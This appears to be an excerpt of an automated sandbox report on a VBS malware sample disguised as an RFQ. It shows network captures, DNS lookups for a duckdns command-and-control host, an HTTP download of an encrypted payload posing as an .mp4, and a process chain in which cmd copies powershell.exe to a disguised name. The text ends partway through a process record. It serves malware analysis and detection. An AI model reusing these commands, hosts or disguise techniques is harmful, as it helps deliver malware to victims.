                                                                                                                        Jan 15, 2025 11:38:37.820210934 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.820214033 CET497389910192.168.2.4194.226.169.227
                                                                                                                        Jan 15, 2025 11:38:37.820244074 CET497389910192.168.2.4194.226.169.227
                                                                                                                        Jan 15, 2025 11:38:37.820266008 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.820307016 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.820319891 CET497389910192.168.2.4194.226.169.227
                                                                                                                        Jan 15, 2025 11:38:37.820334911 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.820368052 CET497389910192.168.2.4194.226.169.227
                                                                                                                        Jan 15, 2025 11:38:37.820421934 CET497389910192.168.2.4194.226.169.227
                                                                                                                        Jan 15, 2025 11:38:37.824059963 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.824089050 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.824137926 CET497389910192.168.2.4194.226.169.227
                                                                                                                        Jan 15, 2025 11:38:37.824690104 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.824721098 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.824744940 CET497389910192.168.2.4194.226.169.227
                                                                                                                        Jan 15, 2025 11:38:37.824759960 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.824800968 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.824831963 CET497389910192.168.2.4194.226.169.227
                                                                                                                        Jan 15, 2025 11:38:37.824837923 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.824892044 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.824937105 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.824965000 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.824991941 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.825068951 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.825095892 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.825124025 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.825186968 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.825215101 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.825242996 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.825269938 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.825298071 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.825325012 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.825352907 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.825380087 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.828829050 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.828856945 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.828886032 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.828913927 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.828943014 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.829497099 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.829526901 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.829595089 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.829622030 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.829687119 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.829714060 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.829742908 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.829807043 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.829834938 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.829863071 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.829890013 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.829917908 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.829986095 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830014944 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830041885 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830070019 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830097914 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830125093 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830152988 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830179930 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830208063 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830235004 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830261946 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830288887 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830316067 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830343008 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830409050 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830436945 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830463886 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830492020 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830557108 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830584049 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:37.830610991 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:38.343703985 CET497389910192.168.2.4194.226.169.227
                                                                                                                        Jan 15, 2025 11:38:38.348716021 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:38.348927021 CET497389910192.168.2.4194.226.169.227
                                                                                                                        Jan 15, 2025 11:38:38.353858948 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:38.669622898 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:38.717758894 CET497389910192.168.2.4194.226.169.227
                                                                                                                        Jan 15, 2025 11:38:38.808576107 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:38.815336943 CET497389910192.168.2.4194.226.169.227
                                                                                                                        Jan 15, 2025 11:38:38.820491076 CET991049738194.226.169.227192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:38.820772886 CET497389910192.168.2.4194.226.169.227
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jan 15, 2025 11:38:09.287466049 CET5309253192.168.2.41.1.1.1
                                                                                                                        Jan 15, 2025 11:38:09.520229101 CET53530921.1.1.1192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:34.227838039 CET6146853192.168.2.41.1.1.1
                                                                                                                        Jan 15, 2025 11:38:34.330296040 CET53614681.1.1.1192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:36.022758961 CET5093853192.168.2.41.1.1.1
                                                                                                                        Jan 15, 2025 11:38:36.031413078 CET53509381.1.1.1192.168.2.4
                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Jan 15, 2025 11:38:09.287466049 CET192.168.2.41.1.1.10x6f8bStandard query (0)cud-senegal.orgA (IP address)IN (0x0001)false
                                                                                                                        Jan 15, 2025 11:38:34.227838039 CET192.168.2.41.1.1.10x2e49Standard query (0)coloscolorado.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                        Jan 15, 2025 11:38:36.022758961 CET192.168.2.41.1.1.10x2b44Standard query (0)35.37.15.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Jan 15, 2025 11:38:09.520229101 CET1.1.1.1192.168.2.40x6f8bNo error (0)cud-senegal.org51.159.14.89A (IP address)IN (0x0001)false
                                                                                                                        Jan 15, 2025 11:38:34.330296040 CET1.1.1.1192.168.2.40x2e49No error (0)coloscolorado.duckdns.org194.226.169.227A (IP address)IN (0x0001)false
                                                                                                                        Jan 15, 2025 11:38:36.031413078 CET1.1.1.1192.168.2.40x2b44Name error (3)35.37.15.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                        • cud-senegal.org
                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.44973051.159.14.894437728C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-15 10:38:10 UTC216OUTGET /post-postlogin/Agfdatq.mp4 HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                                        Host: cud-senegal.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2025-01-15 10:38:10 UTC208INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Wed, 15 Jan 2025 10:38:10 GMT
                                                                                                                        Content-Type: video/mp4
                                                                                                                        Content-Length: 1377288
                                                                                                                        Connection: close
                                                                                                                        Last-Modified: Wed, 15 Jan 2025 09:54:03 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        2025-01-15 10:38:10 UTC16176INData Raw: 5f 68 ca 51 88 0c 9a 90 e8 c1 4e 82 d6 3b f8 87 42 30 1e a6 31 ca df 49 02 de a8 2a ed bb 27 ac 24 a0 72 6e ea 08 12 c6 dd 23 c2 be 0a 9c 10 4a be ac 93 47 df 46 fd e6 41 d1 49 ed af 85 f2 92 f8 e9 16 7f 62 5a 05 87 6c a1 8c 02 5c 53 fa 5a a1 10 a8 c0 7d 9e cd 80 0a 97 d6 ee d9 96 f8 2a 01 e2 a6 77 03 f2 2c 46 34 75 88 56 da 8d a1 f7 33 4f ea e3 19 da 3a ee 79 37 a6 36 1e 89 4f ce 60 a4 d4 00 c7 c4 bb 50 8b ea 4d 0f 30 1b 15 a8 7b 60 8b 25 38 89 e4 df 75 96 0d 07 53 92 2d 34 21 72 89 2e ff 87 da 13 61 40 e6 ec 6c 44 db 3e d3 04 2f 20 67 2d f0 a0 ae e9 e3 c8 54 6c 36 83 80 12 5c 27 f9 9b f2 32 32 08 32 55 5b 30 0f 1e e0 ef a9 3c 40 2a 93 c0 86 54 a1 47 a1 6f b4 cc 0e 3a 70 59 76 d3 52 9c 6a b2 de 33 68 d1 4e ec cf c2 9e a3 10 01 be 37 23 a8 06 77 96 3e 13
                                                                                                                        Data Ascii: _hQN;B01I*'$rn#JGFAIbZl\SZ}*w,F4uV3O:y76O`PM0{`%8uS-4!r.a@lD>/ g-Tl6\'222U[0<@*TGo:pYvRj3hN7#w>
                                                                                                                        2025-01-15 10:38:10 UTC16384INData Raw: 0e 7e cb 49 71 48 81 3b 0a 7b 07 30 b2 2c ea 01 0a d4 be 19 36 d1 2a 3a 51 7d 02 26 f3 49 e9 da 22 b5 0a 4c 94 59 23 e8 75 2b f1 7f 23 2f a2 21 b9 e0 03 1f 2a 0a be 87 f2 85 14 2f cb 96 c6 2e 23 ab ee 54 5b 20 85 86 a0 1a 46 1b 51 0a 6d 99 94 92 37 d7 6c e9 db da af 64 86 98 39 81 2f 6c 0f 0e 05 ef 50 fa b1 71 f2 18 d9 e5 0d ca a9 01 e6 0b 9c 23 8f 60 f3 08 f7 91 35 e7 ec 4a 62 c1 9e e0 f3 6c 58 04 69 92 25 99 0b 4a b5 e3 d3 1e 5d a6 06 79 ea e0 04 65 a0 62 7d ef 6d fb 4e b8 e3 14 42 1b 40 0c bf 54 51 9b c6 0b 75 b2 34 62 a6 0c 25 a7 15 3d 31 3b 8f f5 e4 32 90 32 ac 7b 97 be b6 45 29 86 5f eb c5 1b 06 5c 22 fa b7 47 2e 23 9a e1 9b ea 14 28 ad 30 05 bd 55 79 8f 84 a0 9b 14 7f de c7 0b dd 8e 90 ce 7a ed e4 e7 f9 35 7d 87 a5 f7 fd a5 75 25 99 d1 1b ca 64 38
                                                                                                                        Data Ascii: ~IqH;{0,6*:Q}&I"LY#u+#/!*/.#T[ FQm7ld9/lPq#`5JblXi%J]yeb}mNB@TQu4b%=1;22{E)_\"G.#(0Uyz5}u%d8
                                                                                                                        2025-01-15 10:38:10 UTC16384INData Raw: 8d 17 a1 04 33 55 a0 00 e5 12 73 61 2d ab 65 be d0 f9 8e 3c f6 61 45 b8 9b fb ba 06 57 c8 8b 41 6b 46 7c 9c 67 70 d7 d2 9e 7e 10 8e 1c 07 82 f2 9f 93 34 bf 40 a6 4e af 8c 36 3f d8 89 0d 47 64 93 fe 98 7e 75 2f e5 72 2a 7b 8c 73 45 16 8b 86 ad 52 52 49 dc f5 c2 95 66 20 82 8d 11 d3 a9 f3 34 d7 b4 cc 3c cb fd 40 f7 8b e5 ec 1b ed df 8a e0 81 bf c0 e5 a7 97 9b 1d bf d7 9f c8 7d bd 0c 2f ca 43 c4 11 9a ea b4 e3 2c d5 b7 d9 40 7d 94 47 95 4c b8 f4 67 0a 7e ed f6 84 69 5e 7f 6c 79 b9 ef 78 b5 b3 d6 5b 9d 10 4a 81 b8 3d 03 9a 16 c1 e0 a3 96 eb 8b 20 39 0a f4 ec 54 91 ce e9 69 de 85 b5 97 2a 8e b1 64 34 45 de 0e f5 7f 6f e0 23 4f 4c 4f f1 3c 69 7f fd 01 b9 21 3c 53 66 8b 96 06 a1 64 35 43 18 0f a1 c1 62 12 d6 cb bd aa 02 61 c7 e4 7c ab 30 7b e9 fe b0 14 ad e8 9f
                                                                                                                        Data Ascii: 3Usa-e<aEWAkF|gp~4@N6?Gd~u/r*{sERRIf 4<@}/C,@}GLg~i^lyx[J= 9Ti*d4Eo#OLO<i!<Sfd5Cba|0{
                                                                                                                        2025-01-15 10:38:10 UTC16384INData Raw: 8c 89 97 24 70 bf 2c dc 14 be a5 62 6a 1f 8a 9d 2c 3b 3f 8b 5a 1e 6a a0 e9 9e 35 d6 07 10 25 68 02 7e 21 4a 50 00 2d 9d 44 63 c0 0a 20 b5 0d 6f b7 1e fe ea eb 8d 29 db c8 d0 1f 6a 7e bb b2 19 26 31 80 e1 90 3b 44 a9 fb 3c 91 c7 cc 7b 79 b8 34 45 c8 41 18 65 17 4a 8f be 66 13 e8 69 d2 cb f1 a6 bc 50 84 f3 f7 81 44 bf bd 04 34 a0 7e f4 6f ff aa 85 0e e5 10 5b 3c 5e d1 cb ff c2 a9 e6 a9 fe 2a 1e cc 46 35 6d 3b 9d 79 4a 0b f4 1a 50 c4 04 43 0f c5 00 af c4 b9 7b 27 db e1 68 0c 85 28 e3 06 0c 8d 51 1a a5 0a 9c a6 c1 ac 96 bb 2c f0 3a ac c8 8d 4b 38 80 f3 58 2b 76 76 85 e8 35 4f 8d 88 67 d7 eb 1b 50 a5 5b 01 34 74 d0 a5 a8 43 4e 56 49 ef 24 24 a2 30 d9 46 17 be 66 7b ae 5f f4 0f 86 01 69 8e 0d 00 fc 48 31 50 ab b3 01 b5 3e e0 60 d2 d1 7e c4 65 ea c4 d1 01 44 0c
                                                                                                                        Data Ascii: $p,bj,;?Zj5%h~!JP-Dc o)j~&1;D<{y4EAeJfiPD4~o[<^*F5m;yJPC{'h(Q,:K8X+vv5OgP[4tCNVI$$0Ff{_iH1P>`~eD
                                                                                                                        2025-01-15 10:38:10 UTC16384INData Raw: 3f a0 45 23 85 2d 85 f2 48 c5 4c 7d 6a c5 f4 55 1a 0a d9 32 bb 80 b6 78 2a 62 07 2c f9 96 27 1c 89 61 65 81 3f 58 5e 5c be d6 f2 43 8f 4d 61 69 7d 74 5f 68 3f 02 0e 14 80 bd 70 ab 33 85 b8 d9 9d f1 25 c2 37 fd 4e c4 ac 8a 3b 69 3d d1 aa 73 ce 5c 85 d7 6a ee 69 41 6e 8c c7 0b b1 81 f3 cb 9c ef 38 34 f9 f6 7e 18 5f fa 8c a7 6e 96 18 04 44 30 88 33 30 ed ec 1c 19 2f 2c bf 9e 31 ab 30 7b 77 8b a5 54 50 f9 41 5c 84 78 31 b4 73 99 5e 8d aa 3b 40 76 6d b7 21 fb 3b ba aa 61 4b 90 5b b4 e7 50 c0 f6 ea 5c a0 b3 c1 2b 36 d6 21 dc 53 94 86 dc 08 e0 47 02 e8 8a 29 6f 08 f6 9a 86 1d 1f a3 b6 92 fc 9f 7d ee b0 3f df cc fe 30 15 9a 65 82 62 c8 51 b5 a3 ca e7 81 3f f5 52 08 de 7c 34 15 fb b8 e0 8b 43 7a ea 39 f0 a1 23 a7 16 58 c5 8a 82 b1 9c e2 a8 51 91 bb 39 c5 a7 11 58
                                                                                                                        Data Ascii: ?E#-HL}jU2x*b,'ae?X^\CMai}t_h?p3%7N;i=s\jiAn84~_nD030/,10{wTPA\x1s^;@vm!;aK[P\+6!SG)o}?0ebQ?R|4Cz9#XQ9X
                                                                                                                        2025-01-15 10:38:10 UTC16384INData Raw: b1 cc df 80 26 61 dd 51 85 83 85 37 db 11 92 14 0c 99 c6 92 ef bd f3 a1 d9 f8 57 46 37 55 81 2f f6 11 2f 4c b4 0e b3 60 2b b3 c5 85 dc 02 19 6d df 83 81 09 35 e7 17 5d 3e 61 8a 56 64 94 01 e4 e8 fb 23 d7 68 bf f2 c4 b4 cb 50 1e 00 2c ea 2a 2c d4 b0 8f be 63 e9 5a 16 64 d0 dd 18 99 c6 c9 a3 e6 21 95 ab 0d b1 91 f6 b9 43 d3 80 30 a7 0a 3f 72 17 d8 e2 3e f8 50 ec 29 c8 13 ed 05 0b 97 25 98 b1 97 8e fb 2d 5d d8 51 67 23 6d 5d d3 64 d9 0d ed 1c 1c 79 4d f9 ef 32 91 41 90 2a 83 e7 e8 88 9e f4 a1 4e b7 dd bf c6 f8 8c 7e 87 37 22 72 76 3d b4 be 53 4c c2 22 dc 0e 95 22 c5 1a 74 03 ea 65 4a 79 2b 92 04 3a 08 d8 0c 45 10 67 76 48 96 94 7d f9 75 a1 fc 56 ba ea b5 9a f3 ad a0 7a e4 61 cd b7 0e 87 10 c3 51 53 93 1c cd 2d 53 05 c2 5f 27 29 b0 6a 4d ed a9 08 c3 e6 a3 5e
                                                                                                                        Data Ascii: &aQ7WF7U//L`+m5]>aVd#hP,*,cZd!C0?r>P)%-]Qg#m]dyM2A*N~7"rv=SL""teJy+:EgvH}uVzaQS-S_')jM^
                                                                                                                        2025-01-15 10:38:10 UTC16384INData Raw: d7 77 1a f2 58 3b 29 b1 44 eb d8 5d c2 0b 1d 46 e0 fe 89 38 93 d7 33 30 2e 3a a0 fa 68 83 77 ca 2f 17 ac d4 60 90 4d 04 80 98 34 e6 0d 03 d1 be 6e 10 20 6d 0e d4 ea 5d 5f df f5 85 62 25 4d fa 42 c6 40 a3 2d 67 8c 1d 9c 29 30 ce a1 de e7 8c 56 7b da 2e bc 0a d8 50 42 31 33 91 6c d1 5e e0 04 66 88 ec 60 16 c1 4e b6 50 dc 17 23 19 fd ca 6a 00 da 81 b0 76 d4 b2 9c e2 2c 78 8a 76 c8 ef dd 68 64 11 d4 ca 4c f2 e6 7b 1a a8 18 20 43 6f 5b 52 22 e9 55 3b ab 1e 40 4a 1d 84 f6 09 97 61 d4 f8 62 15 e5 47 a9 e8 ba 99 ec c1 02 d0 b6 87 5c d2 02 7c f9 79 ac 11 88 d0 47 43 fe 8d e6 d8 8d 15 20 c4 4b 98 74 4f ec 4f be 2e 64 d4 15 75 9d f8 f7 b0 c9 bf 8d d9 04 36 34 c3 e6 b7 2d a3 50 7b 51 59 73 78 fe f1 e2 05 2c 58 15 9e d2 e8 36 c1 50 d1 b4 fc 2e db 18 bd 2e f6 1f ca ad
                                                                                                                        Data Ascii: wX;)D]F830.:hw/`M4n m]_b%MB@-g)0V{.PB13l^f`NP#jv,xvhdL{ Co[R"U;@JabG\|yGC KtOO.du64-P{QYsx,X6P..
                                                                                                                        2025-01-15 10:38:10 UTC16384INData Raw: 55 ea 01 5d ff 71 7b 6d d0 ee c2 7d 89 c9 3a 4f ce c6 14 0c 08 a3 ae dd c6 9f f7 50 eb 88 bb eb f1 a3 0a 13 a5 c0 ca 5e b7 2f 8f 6d bd 33 d9 7c 0e 2f 85 c6 d5 a6 0e 19 95 98 95 af 31 98 fa 6a ff 93 d4 9e 85 3a af 15 e3 e4 ec 0a ea 89 62 7f 0a 80 78 6a 8e 5d 54 ad 6e 71 b9 bd 94 d2 4a 3d b1 1d 02 b9 89 5d 17 e7 eb de 8c 74 d3 f3 97 60 86 e4 4e b5 4f 47 64 df 38 f9 4a 82 0f 6f aa 45 58 ff 41 d0 a0 7d 9c 2a b3 5b 3a ad 63 34 9d ff 6a 7a ae 53 70 f8 5d 0f a9 67 cc bd 0a 14 42 66 7a 53 6b 57 35 9f 94 81 9e 03 d9 4c a9 f6 7e ff 33 bf 6e f4 44 06 1e 08 2c b6 15 5c 8d c9 93 df 72 e3 e1 29 aa 43 ac 80 8f 03 d1 ae ad 75 b4 6d 45 3f be 38 8b be 68 9e 84 4a 41 dc ed e2 b4 c2 bf a7 71 01 44 0f 9c 44 83 06 09 bc 06 73 c6 82 95 64 90 ae 3c 6e 59 f3 18 62 10 98 97 52 99
                                                                                                                        Data Ascii: U]q{m}:OP^/m3|/1j:bxj]TnqJ=]t`NOGd8JoEXA}*[:c4jzSp]gBfzSkW5L~3nD,\r)CumE?8hJAqDDsd<nYbR
                                                                                                                        2025-01-15 10:38:10 UTC16384INData Raw: 4b b1 8b f8 35 3a f7 c0 8f 45 b5 01 75 52 1b 2e e3 00 86 f1 be 32 d3 00 12 d0 55 fa 8f b4 7d a3 1c a0 67 9e 09 22 07 71 4c ce e4 85 89 cb 43 28 ad 9e 67 4b 6c 09 ce e3 c7 54 75 24 3e ff 4a 38 59 51 c1 d6 3a 93 61 5e e1 54 a9 1a 01 7b 7c d3 e5 e4 a3 2b f8 18 b5 46 1f 32 85 40 fe 9a e0 d8 51 68 cf ff 77 a9 0a 1d b6 a5 4e 1f d7 bf f6 c0 a9 c4 15 97 40 c9 77 45 30 1e 4d b8 07 54 cd be 4e 72 fd b8 af e1 0c c5 ed 9b 11 c4 18 82 1d 0f 96 89 cf 91 3e 3c 77 c2 ce 48 c8 2b 7b 9b b0 f0 05 0d fd 08 f7 04 47 83 66 b1 3d 1a 45 f1 f2 96 bd ac 31 a5 56 44 d0 78 bb 47 97 89 1c ed f7 e7 95 a9 9f 6c d3 51 0b 54 d0 ad a2 4d 24 a5 7e ad 93 fc 00 71 78 56 44 92 00 ea 3f 65 e6 19 30 1d 8e 40 a1 b5 b7 3d a4 de 82 91 c8 42 9f c2 64 8d 73 ef 98 cd 16 ce 55 e0 94 5a 8d 07 2c 03 9d
                                                                                                                        Data Ascii: K5:EuR.2U}g"qLC(gKlTu$>J8YQ:a^T{|+F2@QhwN@wE0MTNr><wH+{Gf=E1VDxGlQTM$~qxVD?e0@=BdsUZ,
                                                                                                                        2025-01-15 10:38:10 UTC16384INData Raw: 75 1f 00 7d ea 3d a4 e0 cd 5c 28 48 8f f9 1f 70 67 33 58 b2 f6 aa 37 5c 10 91 5a 55 94 60 d1 0e 96 a8 de 26 06 11 12 e2 6c 10 f7 cb 45 84 d8 be 5a 53 86 a5 e8 b1 f2 99 80 c1 16 be 67 c2 91 08 b0 02 86 e1 32 5d 4d 5b 21 93 e1 94 02 fc ce e2 6a 4b 05 91 4b c8 3e a7 e2 49 ee e6 bb fc b6 7f a0 89 ca ce e9 c9 64 4c 11 81 a3 dd a6 d9 f2 8c 06 30 88 e0 52 a5 7e 14 f5 97 39 5a bc 46 8f cb 79 82 65 c8 04 0f 21 58 6c 96 42 4c 25 3c f9 8f 47 36 52 4f 2f 75 ce 74 d9 51 53 59 ab 62 82 6c 12 66 2a 0d da 12 8e 27 e4 db e9 ff 4e ce d9 47 2a 7b e1 f4 01 ac 1a 21 f0 11 b8 0b af 4e 49 66 fc ca 15 1f e4 ab 6b 5b ce 8f ff c6 fe 49 a5 0f d4 59 3d da 4b 91 4f 0b 7f 43 ed bc e5 df 6e ec c1 87 c8 5f 9e 8c b7 8c c8 aa 3d a4 4c 55 6c 62 74 31 19 f5 a4 01 a8 18 9d ca 36 44 16 15 63
                                                                                                                        Data Ascii: u}=\(Hpg3X7\ZU`&lEZSg2]M[!jKK>IdL0R~9ZFye!XlBL%<G6RO/utQSYblf*'NG*{!NIfk[IY=KOCn_=LUlbt16Dc


                                                                                                                        Click to jump to process

                                                                                                                        Click to jump to process

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Click to jump to process

                                                                                                                        Target ID:0
                                                                                                                        Start time:05:38:03
                                                                                                                        Start date:15/01/2025
                                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs"
                                                                                                                        Imagebase:0x7ff612a00000
                                                                                                                        File size:170'496 bytes
                                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:1
                                                                                                                        Start time:05:38:04
                                                                                                                        Start date:15/01/2025
                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" /Y
                                                                                                                        Imagebase:0x7ff7b67b0000
                                                                                                                        File size:289'792 bytes
                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:2
                                                                                                                        Start time:05:38:04
                                                                                                                        Start date:15/01/2025
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                        File size:862'208 bytes
                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:3
                                                                                                                        Start time:05:38:06
                                                                                                                        Start date:15/01/2025
                                                                                                                        Path:C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe
                                                                                                                        Wow64 process (32bit):true
